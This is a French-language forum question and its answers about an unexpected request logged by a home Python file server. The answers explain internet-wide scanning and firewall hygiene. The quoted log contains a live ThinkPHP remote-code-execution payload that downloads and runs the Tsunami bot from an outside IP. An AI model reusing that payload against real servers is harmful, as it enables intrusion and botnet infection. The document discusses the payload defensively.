Il y a quelques minutes, j'ai exécuté un serveur basé sur python pour partager quelques fichiers avec mon ami. J'ai désactivé le pare-feu Windows pour qu'il puisse se connecter et télécharger les fichiers. Quand quelqu'un essaie de se connecter au serveur, Python montre son adresse IP et le chemin qu'il a demandé.
Quelqu'un que je ne connais pas a essayé d'obtenir mon index.php et d'exécuter wget. J'ai vérifié leur adresse IP et il semble qu'ils viennent du Japon. Alors, comment cette personne a-t-elle connu mon adresse IP et a-t-elle essayé de se connecter à mon ordinateur? Je ne l'ai partagé avec mon ami que sur WhatsApp.
Je l'ai déjà fait plusieurs fois et c'est la première fois que quelque chose comme ça se produit.
61.192.55.32 - - [06/Jan/2019 01:27:16] code 400, message Bad request syntax ("GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://185.255.25.168/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86' HTTP/1.1")
61.192.55.32 - - [06/Jan/2019 01:27:16] "GET /index.php?s=/index/ hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://185.255.25.168/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86' HTTP/1.1" 400 -
3 Réponses :
C'est une technique de piratage assez courante. Les pirates analysent Internet en utilisant des adresses IP apparemment aléatoires (et ont choisi le vôtre), recherchent des ports ouverts (généralement des ports communs comme 22, 80 et 443) et exécutent un tas d'exploits courants dans le but de prendre le contrôle de la machine.
De nombreux botnet ont été créés en attaquant simplement des adresses IP aléatoires en espérant qu'ils auraient un routeur avec un nom d'utilisateur et un mot de passe par défaut toujours définis sur leur routeur, ou avec des logiciels obsolètes avec des exploits connus.
Dans votre cas, il semble qu'ils espéraient que votre serveur Web exécutait une certaine combinaison de logiciels PHP. Votre adresse IP était probablement l'une des milliers sur lesquelles ils ont exécuté la même requête.
De nombreuses personnes exécutent des outils tels que Masscan avec des scripts personnalisés à la recherche de serveurs Web vulnérables. La plupart du temps, ce type de script tente d'obtenir des shells inversés pour tenter de construire des armées de botnet. Il y a des informations sur le piratage de machines Windows connectées à Internet avant que SO ne termine également son installation.
C'est pourquoi vous ne devriez pas désactiver votre pare-feu: le temps moyen qu'il faut entre une connexion sans protection et une personne essayant de percer votre système est au mieux de quelques minutes.
Au lieu de cela, vous devriez découvrir l'adresse IP de votre ami et autoriser cette seule adresse IP. Et à moins que votre ami n'ait une adresse IP statique, supprimez cette autorisation une fois le test terminé, car quelqu'un d'autre pourrait obtenir cette adresse plus tard.